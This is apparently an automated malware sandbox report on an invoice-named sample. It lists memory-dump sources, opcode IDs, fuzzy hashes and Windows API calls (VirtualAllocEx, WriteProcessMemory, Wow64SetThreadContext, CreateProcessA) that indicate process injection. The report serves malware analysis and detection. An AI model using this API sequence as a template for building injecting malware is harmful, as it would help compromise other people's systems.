                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0A035ED7
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: 8f180bd69e5061a5de0c128976a027717b7f584144ef238ee0df4740ef0061e0
                                                                                • Instruction ID: 9a8d1897c254c2dd22855c59941cdcc7f84348a0b11551cc1c6574ba2bb4465d
                                                                                • Opcode Fuzzy Hash: 8f180bd69e5061a5de0c128976a027717b7f584144ef238ee0df4740ef0061e0
                                                                                • Instruction Fuzzy Hash: F7A1F075D0021C8FDB64CFA9C885BEEBBF1BF09300F14916AE859A7290DB749985CF45
                                                                                APIs
                                                                                • CopyFileA.KERNEL32(?,?,?), ref: 0A0389E3
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID: CopyFile
                                                                                • String ID:
                                                                                • API String ID: 1304948518-0
                                                                                • Opcode ID: d23c30dc2b2a0988e952b06326a55e6623c5dee6c705364ce1bf3b3005450f90
                                                                                • Instruction ID: 31494a0fc7699c090a0cca2e820a4f9de21e3efdcd57836c8875a6306c68b0d9
                                                                                • Opcode Fuzzy Hash: d23c30dc2b2a0988e952b06326a55e6623c5dee6c705364ce1bf3b3005450f90
                                                                                • Instruction Fuzzy Hash: A8712272D0021C9FEB14CFA9C9857EDBBF1BB49310F28816AE855A7240D7789989CF85
                                                                                APIs
                                                                                • CopyFileA.KERNEL32(?,?,?), ref: 0A0389E3
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID: CopyFile
                                                                                • String ID:
                                                                                • API String ID: 1304948518-0
                                                                                • Opcode ID: 56842e1350c4d29f052ed0f1490cefc39af6425aef592d49cfa14fb39bd8e1d3
                                                                                • Instruction ID: df4d0376eef16032b37f0a365bf770937c717a9771194fefa1b8b7982d67e1ce
                                                                                • Opcode Fuzzy Hash: 56842e1350c4d29f052ed0f1490cefc39af6425aef592d49cfa14fb39bd8e1d3
                                                                                • Instruction Fuzzy Hash: E1613372D0031CDFEB14CFA9C9457ADBBF5BB09314F28816AE855A7280DB788989CF45
                                                                                APIs
                                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0A037084
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 544645111-0
                                                                                • Opcode ID: 2401eee4356cda249d56d128d82510a26fdf8931e8df9ecfbd51e0afc9341a32
                                                                                • Instruction ID: 53721214157cdf2a08a059e00f3ad3e422517e8e2690f4f809af4278c10a3013
                                                                                • Opcode Fuzzy Hash: 2401eee4356cda249d56d128d82510a26fdf8931e8df9ecfbd51e0afc9341a32
                                                                                • Instruction Fuzzy Hash: 9C41CDB9D05258DFCF10CFA9D580AEEFBB0BB49320F14942AE855B7210D735A945CF64
                                                                                APIs
                                                                                • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0A036BC3
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: 24cc0fd6ccea61f493de1cc16f0b7567fd1ef3fa2c32fd60102d999c14d15fc2
                                                                                • Instruction ID: b8d7ccc35e0e6ec01d0846a4dabd033131edb25e1de16a96a8ad8865c3cbfc9f
                                                                                • Opcode Fuzzy Hash: 24cc0fd6ccea61f493de1cc16f0b7567fd1ef3fa2c32fd60102d999c14d15fc2
                                                                                • Instruction Fuzzy Hash: DF41ABB5D012589FDF14CFA9D980ADEBBF1BB49310F14902AE814B7250C779AA45CF68
                                                                                APIs
                                                                                • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0A036BC3
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: 10175874ccbe4735fb25e9e758070211dc836b39496eb06fbb2f1625a478569b
                                                                                • Instruction ID: 2dfb7511e24218a143fe89ddb5ee4a2bce47c72266161b159bccf475f2856af5
                                                                                • Opcode Fuzzy Hash: 10175874ccbe4735fb25e9e758070211dc836b39496eb06fbb2f1625a478569b
                                                                                • Instruction Fuzzy Hash: 5D41BAB5D012589FCF10CFA9D980AEEFBF5BB49310F14902AE814B7200C779AA45CF68
                                                                                APIs
                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A036A3A
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 25a20a7072ec23f2d875ad41a21d059418b7a70ecf5922ed507f0f7f228d6ce7
                                                                                • Instruction ID: 462cb56388274fbd5eeb74324ddee72b0ebdfe1be177d98f709a776748bdb753
                                                                                • Opcode Fuzzy Hash: 25a20a7072ec23f2d875ad41a21d059418b7a70ecf5922ed507f0f7f228d6ce7
                                                                                • Instruction Fuzzy Hash: 493198B9D002589FDF14CFA9D980A9EFBB1BB49310F14902AE815BB310D735A901CF69
                                                                                APIs
                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A036A3A
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: d7770f4f14030d1cb957077cdc39e985a98c791940eff9faf2e8fb5b56d8d339
                                                                                • Instruction ID: a864841fe811dd7fd6d94d28d4e9ea18b68c213f880893498770050a7672f0fe
                                                                                • Opcode Fuzzy Hash: d7770f4f14030d1cb957077cdc39e985a98c791940eff9faf2e8fb5b56d8d339
                                                                                • Instruction Fuzzy Hash: 7E3188B9D012589FCF14CFA9D980ADEFBB5BB49310F14942AE815B7310D735A941CF68
                                                                                APIs
                                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0A037084
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 544645111-0
                                                                                • Opcode ID: 8b1ac0cc380e4720c322306a25b8b714f043faf066a597a7d1b0e2cffd1d970a
                                                                                • Instruction ID: 3ce5e59721486c7f99280a6b8a25913fc10f60e161cd5c83ae2becdf58bcd175
                                                                                • Opcode Fuzzy Hash: 8b1ac0cc380e4720c322306a25b8b714f043faf066a597a7d1b0e2cffd1d970a
                                                                                • Instruction Fuzzy Hash: 0531A9B5D01258DFDF14CFAAD980AEEFBB4AB09310F14942AE815B7210D739A945CF68
                                                                                APIs
                                                                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 0A0EDB54
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1423528202.000000000A0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_a0e0000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 544645111-0
                                                                                • Opcode ID: f455728d3a9eefc78b66b2ad629411322b894e61875c5e98db241c5239c6e553
                                                                                • Instruction ID: 1b291867012daec0bd5bdd02ffd86eebd6df86b074e75fd46f674627b0747d06
                                                                                • Opcode Fuzzy Hash: f455728d3a9eefc78b66b2ad629411322b894e61875c5e98db241c5239c6e553
                                                                                • Instruction Fuzzy Hash: EE3186B9D012589FDF14CFAAD980A9EFBB1BB49310F14942AE814B7210D735A945CF68
                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 0A0364DF
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                • Opcode ID: c9b8d2f7bbcc84d1aa891adb940239bcb47c63a592a0255f56a41a061912039f
                                                                                • Instruction ID: 67d01d075abe2e5c72942de687789c81775d64c1cca753b3ef5f3ff2630cc072
                                                                                • Opcode Fuzzy Hash: c9b8d2f7bbcc84d1aa891adb940239bcb47c63a592a0255f56a41a061912039f
                                                                                • Instruction Fuzzy Hash: 7941BBB5D01258AFDB14DFA9D984AEEBBF0BF49310F24802AE814BB240D7799945CF64
                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 0A0364DF
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                • Opcode ID: f9553db158b9de7e58959ca3fdfc67b52e75fe85cc1a9eed671299eca486c192
                                                                                • Instruction ID: 64f9f44814939bd78d2325b086122ebd494f52995bd6dd0e87a5220b4716dd37
                                                                                • Opcode Fuzzy Hash: f9553db158b9de7e58959ca3fdfc67b52e75fe85cc1a9eed671299eca486c192
                                                                                • Instruction Fuzzy Hash: A731BCB5D01258AFDB14CFAAD984AEEFBF4BF48310F14802AE414B7240D739A945CF68
                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(?,?,?,?), ref: 0A0EED17
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1423528202.000000000A0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_a0e0000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 769be05aa3726aecb81634460d01b8195cff61aa8294b5a6bb3f59a558b86245
                                                                                • Instruction ID: 27ab78694447851a1484331515cdeb5ca24b1bd497fba41444498a9333786c8d
                                                                                • Opcode Fuzzy Hash: 769be05aa3726aecb81634460d01b8195cff61aa8294b5a6bb3f59a558b86245
                                                                                • Instruction Fuzzy Hash: BD3198B9D0525CAFDF14CFA9D980A9EFBB0BF49310F14942AE814B7210D735A945CF68
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1409226714.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_76d0000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'q
                                                                                • API String ID: 0-1807707664
                                                                                • Opcode ID: 2b0cedb07f3ca12bdd650d18b793f709a6d00c7d5c71e2bbd4d9429d770b278e
                                                                                • Instruction ID: bf0ae293179450ac6faa21daac017b1524a5faaf38b8139242c577be4beb3592
                                                                                • Opcode Fuzzy Hash: 2b0cedb07f3ca12bdd650d18b793f709a6d00c7d5c71e2bbd4d9429d770b278e
                                                                                • Instruction Fuzzy Hash: FE3171B4D14289CFDB15CFA5D4146EEBFB1EF86311F0481AAD812A7291CB384E46CF91
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 8q
                                                                                • API String ID: 0-4083045702
                                                                                • Opcode ID: 9a564c7f00645d3b51ddc44ec9d85a249994d476a20bf9abedbaac48eac04bb4
                                                                                • Instruction ID: 52a18cae4d6345d3e4dba630ae26d6c7fd150d9e0d468de4ad0e58c7121552ae
                                                                                • Opcode Fuzzy Hash: 9a564c7f00645d3b51ddc44ec9d85a249994d476a20bf9abedbaac48eac04bb4
                                                                                • Instruction Fuzzy Hash: FC11C234700308CFE315973AE448B66BBEAFBC9354F5584A5E146CB2A5CB389C82C751
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 8q
                                                                                • API String ID: 0-4083045702
                                                                                • Opcode ID: 6a629828892a1643a88f532837a812f8e4e6569a416bd0b2adaebfa5ea3d9c23
                                                                                • Instruction ID: 28314ac59b00e3c57d2417d8d7a4a2e15ff00396919a52de97300a3e760393a3
                                                                                • Opcode Fuzzy Hash: 6a629828892a1643a88f532837a812f8e4e6569a416bd0b2adaebfa5ea3d9c23
                                                                                • Instruction Fuzzy Hash: B401C035700208CFE715973AE44CB667BEAFBC8354F558464E20A8B2A4CB349C42C750
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 695d97d4fd01e703abfa5e171f8a33b1108d46318b623e9164b4f9840018856b
                                                                                • Instruction ID: 55a7b9782d6a0a1dc31e73d13c74c03b95c8406359d2d379f7d3da0644e0f210
                                                                                • Opcode Fuzzy Hash: 695d97d4fd01e703abfa5e171f8a33b1108d46318b623e9164b4f9840018856b
                                                                                • Instruction Fuzzy Hash: 05D116357002049FDB18DF68C980AAD77F2FF89764B5085A8E9069F361DB31ED46CBA0
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 781759d25c89243b510f1f37c4865b9dd1e4ff0e029683fbaae7200801f6d514
                                                                                • Instruction ID: e2d70e9614af47ce5821342ae9b33bb54a2369ce8d69445cd9ee1d2217cd9f9f
                                                                                • Opcode Fuzzy Hash: 781759d25c89243b510f1f37c4865b9dd1e4ff0e029683fbaae7200801f6d514
                                                                                • Instruction Fuzzy Hash: 60C1CC71A103089FEB14EFA9D844AADFBB2FF88354F158559E5069F364CB34AD49CB80
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 969326903b230d719311da49a0b383beca92e7fd7f6923c20a789490d9027cc7
                                                                                • Instruction ID: c8aadea539449ee3c07684e21138ede2363050d7d221f7ee3502c7d6bf851cc5
                                                                                • Opcode Fuzzy Hash: 969326903b230d719311da49a0b383beca92e7fd7f6923c20a789490d9027cc7
                                                                                • Instruction Fuzzy Hash: 6091D070A00205DFDB19CF58C494AAEFBB1FF48314B258299D915DB3A1C736EC91CBA4
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cd0c6ba6c5e63e2a6c3f3a2ea785108cf0cfab056ca036bf67ac9f646b00e577
                                                                                • Instruction ID: 04d00a48934e62ab3de8c314b95869624c40828d3fec67b33be7f6410f844f1c
                                                                                • Opcode Fuzzy Hash: cd0c6ba6c5e63e2a6c3f3a2ea785108cf0cfab056ca036bf67ac9f646b00e577
                                                                                • Instruction Fuzzy Hash: 5971CE30A003088FEB24DF68D890AEDFBF6FF85394F14896AD1159B651DB71AC46CB90
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d7782598086e2631949c52015ea0151cc9640f21527dc23e2a4d1196ce257527
                                                                                • Instruction ID: c62c6d2a1c7613a7905fdde0fac48233e15c42472047d2de3f4f7b5a030165da
                                                                                • Opcode Fuzzy Hash: d7782598086e2631949c52015ea0151cc9640f21527dc23e2a4d1196ce257527
                                                                                • Instruction Fuzzy Hash: 63717170E002089FEF14DFA4D890BADBBF2BF85394F148569D512AB760DB34AD46CB90
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4f7e9f4543419c53e67cdbe27c438e7ac2ad475b7d2d7bca8ccfe67a3b8268e5
                                                                                • Instruction ID: ed89faa2b4f82b4a3723299b16f04da885aae34ec4e6acc5f8ec8d61172f7595
                                                                                • Opcode Fuzzy Hash: 4f7e9f4543419c53e67cdbe27c438e7ac2ad475b7d2d7bca8ccfe67a3b8268e5
                                                                                • Instruction Fuzzy Hash: 82714931A1420ACFEB14CF58D5A8B99F7B2FB88350F15C266E515DBB99C734E881CB50
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1423807010.000000000A340000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A340000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_a340000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 09fb405ef465df21d4d41bd08b0e9ba13bc5ebe86d6d552e60146ff585d89eb7
                                                                                • Instruction ID: d09ec5ae7734c98e08a48c0045cd198dbd120c99e31176a4bec69b60e8693cb6
                                                                                • Opcode Fuzzy Hash: 09fb405ef465df21d4d41bd08b0e9ba13bc5ebe86d6d552e60146ff585d89eb7
                                                                                • Instruction Fuzzy Hash: 7F71E174E0020CEFDB14DFA9E588AAEFBB6EF49304F104029E916AB754DB345945CFA1
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9464a17559e1c818d3e97a219f9be6cc08a52bc4652f359de4037d98c6746987
                                                                                • Instruction ID: 9b70e6cf89e58f8cec1947b9f7050294eeba5bd83f38e176af649507d76aeafb
                                                                                • Opcode Fuzzy Hash: 9464a17559e1c818d3e97a219f9be6cc08a52bc4652f359de4037d98c6746987
                                                                                • Instruction Fuzzy Hash: 68515C387002409FDB159FB8D9909AA3BB3FF89314B10497DE9068B761DB32EC45CBA1
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fde1213b545f7d1adef9446af1cd9a5614c0a4bd495c2b8805c5df11c33bd5da
                                                                                • Instruction ID: 9ae9904dfe49b56a469eaa1cec9fe580313d7017581ec7e687fd40e2640a870b
                                                                                • Opcode Fuzzy Hash: fde1213b545f7d1adef9446af1cd9a5614c0a4bd495c2b8805c5df11c33bd5da
                                                                                • Instruction Fuzzy Hash: 8C419231F00208CFEB50CB69E844BAAB7A2EB88355F118577E21AC7660D775D885CB52
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ad5eb5733693a9c0a28c55ac575db1df3117f8bb406c39495ff1954690e8e885
                                                                                • Instruction ID: 9fa8343fb8a7eb050b812c58349347363323dc157992eb5cba05b512e5fe5908
                                                                                • Opcode Fuzzy Hash: ad5eb5733693a9c0a28c55ac575db1df3117f8bb406c39495ff1954690e8e885
                                                                                • Instruction Fuzzy Hash: 16417F75F112049FEB18AB24D4546AABBF2EF99790F04446AD606EB3A0DF70AC41CB90
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0f6543890121bbaf0f400264b57cce2dfe377fa58704c17e326218bcac4974d9
                                                                                • Instruction ID: a1c432cc7c5ac17042ef4e27bbeb69ecdae63e201173fe1bca6fe92f44f01cf0
                                                                                • Opcode Fuzzy Hash: 0f6543890121bbaf0f400264b57cce2dfe377fa58704c17e326218bcac4974d9
                                                                                • Instruction Fuzzy Hash: 10414C71E003089FEB24DFA5D8947ADFBF2AF85394F148469D505AB790DB70AC46CB90
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 40de7eeec9637e490dbe349b8d7db815d0ebb6d704ac3a6a021ee73dd82e96d6
                                                                                • Instruction ID: 9ab5b245364dcb5ce6865e2728cf904f9fc16109df26b14092e48ba0d4a881b9
                                                                                • Opcode Fuzzy Hash: 40de7eeec9637e490dbe349b8d7db815d0ebb6d704ac3a6a021ee73dd82e96d6
                                                                                • Instruction Fuzzy Hash: D0415D356002049FDB18DF68D5909AE77F2FF89764B5084ADE9059F361DB32EC42CBA1
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 98cf9d276301d1991ca6ecfa345ca1f2c02e70aec51791b686e4a50784dd52f9
                                                                                • Instruction ID: 1928d58088044c3ff9ce90b39c8fc824069567e1ca20c522e7947f4013484fb4
                                                                                • Opcode Fuzzy Hash: 98cf9d276301d1991ca6ecfa345ca1f2c02e70aec51791b686e4a50784dd52f9
                                                                                • Instruction Fuzzy Hash: 56416874E00605DFDB19CF48C494AAAF7B1FF48358B1581A9D902AB3A5C336FD91CBA4
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: dff038b5306adbfef699fd2f0bfad64c74963cc65c614a050ec5360758d37670
                                                                                • Instruction ID: 66e4d6efce47336c3dfa606b3b473387dccd8172e141dedf1262d87b71c401cf
                                                                                • Opcode Fuzzy Hash: dff038b5306adbfef699fd2f0bfad64c74963cc65c614a050ec5360758d37670
                                                                                • Instruction Fuzzy Hash: 0731D231E00218CFEF14DB68D45ABEEBBF2EF48350F124469E506AB290CBB55C44CBA1
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f4a648fe41a7346ab82964a580d5f99be3343be45b2d2257ec93009e5ab5956e
                                                                                • Instruction ID: 0efd72c1c2c89e62d2d75e07e66fe6a95af3ee671c0c1d3cd37b27b642137002
                                                                                • Opcode Fuzzy Hash: f4a648fe41a7346ab82964a580d5f99be3343be45b2d2257ec93009e5ab5956e
                                                                                • Instruction Fuzzy Hash: DF4128346002009FDB289F78C990D6A7BB3FB89314B50897DE9164B761DB32EC45CBA1
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0163c4b667de45b9373f231728a9b3bed5a9100195981ed2d4793025bb4fc297
                                                                                • Instruction ID: db7faa76c77c315f2a9c7c9533ed7842708e6b589b3e684c73e925233e63031c
                                                                                • Opcode Fuzzy Hash: 0163c4b667de45b9373f231728a9b3bed5a9100195981ed2d4793025bb4fc297
